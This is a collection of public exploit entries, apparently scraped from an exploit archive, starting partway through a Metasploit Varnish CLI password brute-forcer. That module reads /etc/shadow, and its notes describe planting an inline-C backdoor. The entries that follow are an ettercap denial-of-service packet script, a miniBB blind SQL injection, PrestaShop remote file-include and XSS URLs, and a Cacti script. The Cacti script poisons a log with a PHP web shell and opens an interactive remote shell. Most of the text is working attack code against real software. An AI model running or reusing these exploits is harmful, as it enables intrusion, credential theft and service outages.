                           list of passwords. This module will also attempt to read the /etc/shadow root password hash
                           if a valid password is found. It is possible to execute code as root with a valid password,
                           however this is not yet implemented in this module.',
      'References'     =>
        [
          [ 'OSVDB', '67670' ],
          [ 'CVE', '2009-2936' ],
          # General
          [ 'URL', 'https://www.varnish-cache.org/trac/wiki/CLI' ],
          [ 'CVE', '1999-0502'] # Weak password
        ],
      'Author'         => [ 'patrick' ],
      'License'        => MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(6082),
        OptPath.new('PASS_FILE',  [ false, "File containing passwords, one per line",
          File.join(Msf::Config.data_directory, "wordlists", "unix_passwords.txt") ]),
      ], self.class)

    deregister_options('USERNAME', 'USER_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_USERS')
  end

  def run_host(ip)
        connect
        res = sock.get_once(-1,3) # detect banner
          if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth
            vprint_status("Varnishd CLI detected - authentication required.")
            each_user_pass { |user, pass|
            sock.put("auth #{Rex::Text.rand_text_alphanumeric(3)}\n") # Cause a login fail.
            res = sock.get_once(-1,3) # grab challenge
            if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth
              challenge = $1
              secret = pass + "\n" # newline is needed
              response = challenge + "\n" + secret + challenge + "\n"
              response = Digest::SHA256.hexdigest(response)
              sock.put("auth #{response}\n")
              res = sock.get_once(-1,3)
              if (res =~ /107 \d+/) # 107 auth
                vprint_status("FAILED: #{secret}")
              elsif (res =~ /200 \d+/) # 200 ok
                print_good("GOOD: #{secret}")    
                
                report_auth_info(
                  :host => rhost,
                  :port => rport,
                  :sname => ('varnishd'),
                  :pass => pass,
                  :proof => "#{res}",
                  :source_type => "user_supplied",
                  :active => true
                )
                              
                sock.put("vcl.load #{Rex::Text.rand_text_alphanumeric(3)} /etc/shadow\n") # only returns 1 line of any target file.
                res = sock.get_once(-1,3)
                if (res =~ /root:([\D\S]+):/) # lazy.
                  if ($1[0] == "!")
                    vprint_error("/etc/shadow root uid is disabled.\n")
                  else
                    print_good("/etc/shadow root enabled:\nroot:#{$1}:")
                  end
                else
                  vprint_error("Unable to read /etc/shadow?:\n#{res}\n")
                end
                
                break
              else
                vprint_error("Unknown response:\n#{res}\n")
              end
            end
            }
          elsif (res =~ /Varnish Cache CLI 1.0/)
            print_good("Varnishd CLI does not require authentication!")
          else
            vprint_error("Unknown response:\n#{res}\n")
          end
        disconnect
    end
end

=begin

aushack notes:

- varnishd typically runs as root, forked as unpriv.
- 'param.show' lists configurable options.
- 'cli_timeout' is 60 seconds. param.set cli_timeout 99999 (?) if we want to inject payload into a client thread and avoid being killed.
- 'user' is nobody. param.set user root (may have to stop/start the child to activate)
- 'group' is nogroup. param.set group root (may have to stop/start the child to activate)
- (unless varnishd is launched with -r user,group (read-only) implemented in v4, which may make priv esc fail).
- vcc_unsafe_path is on. used to 'import ../../../../file' etc.
- vcc_allow_inline_c is off. param.set vcc_allow_inline_c on to enable code execution.
- code execution notes:

* quotes must be escaped \"
* \n is a newline
* C{ }C denotes raw C code.
* e.g. C{ unsigned char shellcode[] = \"\xcc\"; }C
* #import <stdio.h> etc must be "newline", i.e. C{ \n#include <stdlib.h>\n dosomething(); }C (without 2x \n, include statement will not interpret correctly).
* C{ asm(\"int3\"); }C can be used for inline assembly / shellcode.
* varnishd has it's own 'vcl' syntax. can't seem to inject C randomly - must fit VCL logic.
* example trigger for backdoor:

VCL server:
  vcl.inline foo "vcl 4.0;\nbackend b { . host = \"127.0.0.1\";  } sub vcl_recv { if (req.url ~ \"^/backd00r\") { C{ asm(\"int3\"); }C } } \n"
  vcl.use foo
  start

Attacker:
  telnet target 80
  GET /backd00r HTTP/1.1
  Host: 127.0.0.1

(... wait for child to execute debug trap INT3 / shellcode).

CLI protocol notes from website:

The CLI protocol used on the management/telnet interface is a strict request/response protocol, there are no unsolicited transmissions from the responding end.

Requests are whitespace separated tokens terminated by a newline (NL) character.

Tokens can be quoted with "..." and common backslash escape forms are accepted: (\n), (\r), (\t), (
), (\"), (\%03o) and (\x%02x)

The response consists of a header which can be read as fixed format or ASCII text:

    1-3      %03d      Response code
    4        ' '       Space
    5-12     %8d       Length of body
    13       \n        NL character.
Followed by the number of bytes announced by the header.

The Responsecode is numeric shorthand for the nature of the reaction, with the following values currently defined in include/cli.h:

enum cli_status_e {
        CLIS_SYNTAX     = 100,
        CLIS_UNKNOWN    = 101,
        CLIS_UNIMPL     = 102,
        CLIS_TOOFEW     = 104,
        CLIS_TOOMANY    = 105,
        CLIS_PARAM      = 106,
        CLIS_OK         = 200,
        CLIS_CANT       = 300,
        CLIS_COMMS      = 400,
        CLIS_CLOSE      = 500
};
=end
HireHackking 
#Exploit Title: 6 Remote ettercap Dos exploits to 1
#Date: 19/12/2014
#Exploit Author: Nick Sampanis
#Vendor Homepage: http://ettercap.github.io
#Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz
#Version: 8.0-8.1
#Tested on: Linux
#CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379
#Make sure that you have installed packefu and pcaprub

require 'packetfu'
include PacketFu

if ARGV.count < 4
    puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface"
    puts "[-]Use valid mac for your interface, if you dont know"+
        " victim's ip address use broadcast"
    exit
end

def nbns_header
    u = UDPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_daddr = ARGV[1]
    u.ip_saddr = ARGV[0]
    u.udp_src = 4444
    u.udp_dst = 137
    u.payload =  "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00"
    u.payload << "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46"#name
    u.payload << "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43"#name
    u.payload << "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00"#name
    u.payload << "\x00\x20" #type
    u.payload << "\x00\x01" #class
    u.payload << "A"*1000 #pad
    u.recalc
    u.to_w(ARGV[3])
end
def gg_client
    u = TCPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_saddr = ARGV[0]
    u.ip_daddr = ARGV[1]
    u.tcp_src = 3333
    u.tcp_dst = 8074
    u.payload = "\x15\x00\x00\x00"  #gg_type
    u.payload << "\xe8\x03\x00\x00" #gg_len
    u.payload << "A"*1000
    u.recalc
    u.to_w(ARGV[3])
end
def dhcp_header
    u = UDPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_daddr = ARGV[0]
    u.ip_saddr = ARGV[1]
    u.udp_src = 67
    u.udp_dst = 4444
    u.payload =  "\x02"*236
    u.payload << "\x63\x82\x53\x63"
    u.payload << "\x35"
    u.payload << "\x00\x05\x00"
    u.payload << "\x51"
    u.payload << "\x00" #size
    u.payload << "A" * 3 #pad
    u.recalc
    u.to_w(ARGV[3])
end

def mdns_header
    u = UDPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_daddr = ARGV[1]
    u.ip_saddr = ARGV[0]
    u.udp_src = 4444
    u.udp_dst = 5353
    u.payload =  "\x11\x11" #id
    u.payload << "\x00\x00" #flags
    u.payload << "\x00\x01" #questions
    u.payload << "\x00\x00" #answer_rr
    u.payload << "\x00\x00" #auth_rrs
    u.payload << "\x00\x00" #additional_rr
    u.payload << "\x06router\x05local\x00" #name
    u.payload << "\x00\x01" #type
    u.payload << "\x00\x01" #class
    u.recalc
    u.to_w(ARGV[3])
end
def mdns_dos_header
    u = UDPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_daddr = ARGV[1]
    u.ip_saddr = ARGV[0]
    u.udp_src = 4444
    u.udp_dst = 5353
    u.payload =  "\x11\x11" #id
    u.payload << "\x00\x00" #flags
    u.payload << "\x00\x01" #questions
    u.payload << "\x00\x00" #answer_rr
    u.payload << "\x00\x00" #auth_rrs
    u.payload << "\x00\x00" #additional_rr
    u.payload << "\x01"
    u.payload << "\x00\x01" #type
    u.payload << "\x00\x01" #class
    u.payload << "A"*500
    u.recalc
    u.to_w(ARGV[3])
end

def pgsql_server
    u = TCPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_saddr = ARGV[1]
    u.ip_daddr = ARGV[0]
    u.tcp_src = 5432
    u.tcp_dst = 3333
    u.payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
    u.recalc
    u.to_w(ARGV[3])
end
def pgsql_client
    u = TCPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_saddr = ARGV[0]
    u.ip_daddr = ARGV[1]
    u.tcp_src = 3333
    u.tcp_dst = 5432
    u.payload = "\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00" 
    u.recalc
    u.to_w(ARGV[3])
end

def pgsql_client_shell
    u = TCPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_saddr = ARGV[0]
    u.ip_daddr = ARGV[1]
    u.tcp_src = 3333
    u.tcp_dst = 5432
    u.payload = "\x70"
    u.payload << "\x00\x00\x03\xe9" #len
    u.payload << "A"*1000
    u.payload << "\x00"
    u.recalc
    u.to_w(ARGV[3])
end

def radius_header
    u = UDPPacket.new()
    u.eth_saddr = ARGV[2]
    u.eth_daddr = "ff:ff:ff:ff:ff:ff"
    u.ip_daddr = ARGV[1]
    u.ip_saddr = ARGV[0]
    u.udp_src = 4444
    u.udp_dst = 1645
    u.payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01"
    u.recalc
    u.to_w(ARGV[3])
end

puts "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis"
puts "[+]-1- nbns plugin CVE-2014-9377"
puts "[+]-2- gg dissector CVE-2014-9376"
puts "[+]-3- dhcp dissector CVE-2014-9376"
puts "[+]-4- mdns plugin CVE-2014-9378"
puts "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)"
puts "[+]-6- radius dissector CVE-2014-9379"
print "choice:"
choice = $stdin.gets.chomp().to_i()

case choice
when 1
    puts "[+]Sending nbns packet.."
    nbns_header
when 2
    puts "[+]Sending client gg packet.."
    gg_client
when 3
    puts "[+]Sending dhcp packet.."
    dhcp_header
when 4
    puts "[+]Sending mdns packet.."
    mdns_header
    mdns_dos_header
when 5
    puts "[+]Sending pgsql packet.."
    pgsql_client
    pgsql_server
    pgsql_client_shell
when 6
    puts "[+]Sending radius packet.."
    radius_header
else
    puts "[-]Unrecognized command "
end
HireHackking 
# Exploit Title: miniBB 3.1 Blind SQL Injection
# Date: 23-11-2014
# Software Link: http://www.minibb.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9254
# Category: webapps

1. Description
  
preg_match() only check if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside regexp).

File: bb_func_unsub.php
$usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0);

$allowUnsub=FALSE;
$chkCode=FALSE;

if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){
	//trying to unsubscribe directly from email
	$chkField='email_code';
	$chkVal=$_GET['code'];
	$userCondition=TRUE;
	$chkCode=TRUE;
}
else{
	//manual unsubsribe
	$chkField='user_id';
	$chkVal=$user_id;
	$userCondition=($usrid==$user_id);
}

if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal))

http://security.szurek.pl/minibb-31-blind-sql-injection.html
  
2. Proof of Concept

http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != '

This SQL will check if first password character user ID=1 is c.

If yes, it will sleep 5 seconds.
  
3. Solution:
  
http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html
HireHackking 
source: https://www.securityfocus.com/bid/47264/info

PrestaShop is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

PrestaShop 1.3.6 and prior are vulnerable; other versions may also be affected.

http://www.example.com/[path]/cms.php?rewrited_url=http://[Shell-Path]
HireHackking 
source: https://www.securityfocus.com/bid/47266/info

Omer Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Omer Portal 3.220060425 is vulnerable; other versions may also be affected. 

http://www.example.com/arama_islem.asp?aramadeger=<script>alert(1)</script>
HireHackking 
               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                 INDEPENDENT SECURITY RESEARCHER 
                   PENETRATION TESTING SECURITY
               -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 

# Exploit Title: ProjectSend r561 - Cross Site Scripting & Full Path Disclosure Vulnerability's 
# Date: 19/12/2014
# Url Vendor: http://www.projectsend.org/
# Vendor Name: ProjectSend 
# Version: r561 Ultimate Version
# CVE:  CVE-2014-1155
# Author: TaurusOmar	
# Tiwtte: @TaurusOmar_
# Email:  taurusomar13@gmail.com
# Home:  overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: Medium

Description
ProjectSend is a client-oriented file uploading utility. Clients are created and assigned a username and a password. Files can then be uploaded under each account with the ability to add a title and description to each.When a client logs in from any browser anywhere, the client will see a page that contains your company logo, and a sortable list of every file uploaded under the client's name, with description, time, date, etc.. It also works as a history of "sent" files, provides a differences between revisions, the time that it took between each revision, and so on.

------------------------
+ CROSS SITE SCRIPTING + 
------------------------
# Exploiting Description - Get into code xss in the box of image description. 
<textarea placeholder="Optionally, enter here a description for the file." name="file[1][description]">DESCRIPTION&lt;/textarea&gt;

#P0c
"><img src=x onerror=;;alert('XSS') />

<textarea placeholder="Optionally, enter here a description for the file." name="file[1][description]">CODE XSS&lt;/textarea&gt;

#Proof Concept
http://i.imgur.com/FOPIvd4.jpg


------------------------
+ FULL PATH DISCLOSURE +
------------------------
# Exploiting Description - The url disclosure directory of platform. 

#P0c
http://site.com/projectsend/templates/pinboxes/template.php

#Proof Concept
http://i.imgur.com/xfN4kDV.jpg
HireHackking 
#!/bin/sh
##############
# Exploit Title: Cacti - Superlinks Plugin 1.4-2 RCE(LFI) via SQL Injection
# Date: 19/12/2014
# Exploit Author: Wireghoul
# Software Link: http://docs.cacti.net/plugin:superlinks
# Identifiers: CVE-2014-4644, EDB-ID-33809
# Exploit explanation through inline comments
# Patch provided at the end
#
# This is the year where hope fails you -- Slipknot: Pulse of the maggots
#
##############

echo -e "\e[32m            *-*,      \e[31m      ___________"
echo -e "\e[32m        ,*\/|\`| ;    \e[31m      /.'_______\`.\\"
echo -e "\e[32m        \\'  | |'; *, \e[31m     /( (_______\`-'\\"
echo -e "\e[32m         \ \`| | ;/ ) \e[31m     \`.\`.______  \.'"
echo -e "\e[32m          : |'| , /   \e[31m      \`..-.___>.'"
echo -e "\e[32m          :'| |, /    \e[31m        \`.__ .'\e[0m"
echo -e " _________\e[32m:_|_|_;\e[0m_______________\e[31m\`.'\e[0m_______[Wireghoul]___"
echo -e " CACTI SUPERLINKS PLUGIN 1.4-2 REMOTE CODE EXECUTION PoC"
echo
if [ -z $1 ]; then
  echo -e "Usage $0 <superpluginurl>\n $0 http://example.com/cacti/plugins/superlinks/superlinks.php\n";
  exit 2;
fi

# This exploit is a second order LFI through SQLI, so first we must write some data to disk
# Luckily the application logs all sort of stuff, so lets poison the application log
# The reason for this is manyfold, read on.
curl --silent "$1?id=SHELL<?php+passthru(\$_GET\[c\])+?>LLEHS<?php+exit+?>" > /dev/null

# Now lets analyse the vulnerability:
# superlinks.php:21:if (isset($_GET['id'])) {
# superlinks.php:22:      $pageid=$_GET['id'];
# superlinks.php:23:}
# superlinks.php:24:
# superlinks.php:25:$page = db_fetch_row("SELECT DISTINCT
# superlinks.php:26:      id,
# superlinks.php:27:      title,
# superlinks.php:28:      style,
# superlinks.php:29:      contentfile
# superlinks.php:30:      FROM (superlinks_pages, superlinks_auth)
# superlinks.php:31:      WHERE superlinks_pages.id=superlinks_auth.pageid
# superlinks.php:32:      AND id=" . $pageid . "
# This is where the injection occurs, we can now union select 1,2,3,4 -- ftw
# However the real fun occurs a few lines later
# superlinks.php:57:              $my_file = $config["base_path"] . "/plugins/superlinks/content/" . $page['contentfile'];
# superlinks.php:58:
# superlinks.php:59:              if (file_exists($my_file)) {
# superlinks.php:60:                      @include_once($my_file);
# We can now include a file of our choosing (LFI) based on the data returned from the SQLi
# There are only a few problems:
# * We cannot use strings/quotes as magic quotes are usually on
# * We do not know the local path for the LFI
# * Usual tricks like /proc/self* have been patched
# * Database server and web server may be different hosts
# Lets solve the easy one first, we dont need to quote our strings, hex encoding works great
# The second one is a little trickier, we can brute force LFI locations... or
# We can dynamically locate a file path which is stored in the database and present on the webserver
# $ mysqldump cacti | grep '\.log'
# INSERT INTO `settings` VALUES ('path_php_binary','/usr/bin/php'),('path_rrdtool','/usr/bin/rrdtool'),('poller_lastrun','1414565401'),('path_webroot','/usr/share/cacti/site'),('date','2014-10-29 17:50:02'),('stats_poller','Time:0.1182 Method:cmd.php Processes:1 Threads:N/A Hosts:2 HostsPerProcess:2 DataSources:0 RRDsProcessed:0'),('stats_recache','RecacheTime:0.0 HostsRecached:0'),('path_snmpwalk','/usr/bin/snmpwalk'),('path_snmpget','/usr/bin/snmpget'),('path_snmpbulkwalk','/usr/bin/snmpbulkwalk'),('path_snmpgetnext','/usr/bin/snmpgetnext'),('path_cactilog','/var/log/cacti/cacti.log'),('snmp_version','net-snmp'),('rrdtool_version','rrd-1.4.x'),('superlinks_tabstyle','0'),('superlinks_hidelogo','0'),('superlinks_hideconsole','0'),('superlinks_db_version','1.4'),('auth_method','1'),('guest_user','guest'),('user_template','0'),('ldap_server',''),('ldap_port','389'),('ldap_port_ssl','636'),('ldap_version','3'),('ldap_encryption','0'),('ldap_referrals','0'),('ldap_mode','0'),('ldap_dn',''),('ldap_group_require',''),('ldap_group_dn',''),('ldap_group_attrib',''),('ldap_group_member_type','1'),('ldap_search_base',''),('ldap_search_filter',''),('ldap_specific_dn',''),('ldap_specific_password','');
# $ ls -la /var/log/cacti/cacti.log
# -rw-r----- 1 www-data www-data 5838 Oct 29 17:50 /var/log/cacti/cacti.log
# $ tail /var/log/cacti/cati.log
# <snip> ERROR: SQL Assoc Failed!, Error:'1064', SQL:"SELECT    graph_templates.id,    graph_templates.name    FROM (graph_local,graph_templates,graph_templates_graph)    WHERE graph_local.id=graph_templates_graph.local_graph_id    AND graph_templates_graph.graph_template_id=graph_templates.id    AND graph_local.host_id=1    AND graph_templates.id=12 select 1,2,3,4 --    GROUP BY graph_templates.id    ORDER BY graph_templates.name"
# WINRAR!

# We can now include the poisoned log file by fetching the log path from the database
# and prepending it with the normal directory traversal pattern ../../../ using concat()
# We traverse 8 deep, that's usually enough
echo -ne "Dropping into shell, type exit to quit.\ncactishell> "
while read line; do
if [ "$line" == "exit" ]; then
    exit
fi
comand=`echo -n $line | sed -e's/ /+/g'`
curl --silent "$1?id=123+union+select+1,2,3,concat(0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f,value)+from+settings+where+name=0x706174685f63616374696c6f67+--+-&c=$comand" | \
sed -n '/SHELL/, $p' | \
sed -e 's/.*SHELL//' |\
sed '/LLEHS/, $d'
echo -n "cactishell> "
done

# Proposed patch
# Vendor has a patch in a SVN repo somewhere:
# http://bugs.cacti.net/bug_view_advanced_page.php?bug_id=2475
# Yet has not made the patch available, or responded to requests to do so:
# http://forums.cacti.net/viewtopic.php?t=53711
#--- superlinks.php    2014-12-18 02:05:37.706013833 -0500
#+++ superlinks.php 2014-12-18 02:05:09.694014497 -0500
#@@ -19,7 +19,7 @@
#
# $pageid = 0;
# if (isset($_GET['id'])) { 
#-   $pageid=intval($_GET['id']);
#+   $pageid=$_GET['id']; 
# }
#
# $page = db_fetch_row("SELECT DISTINCT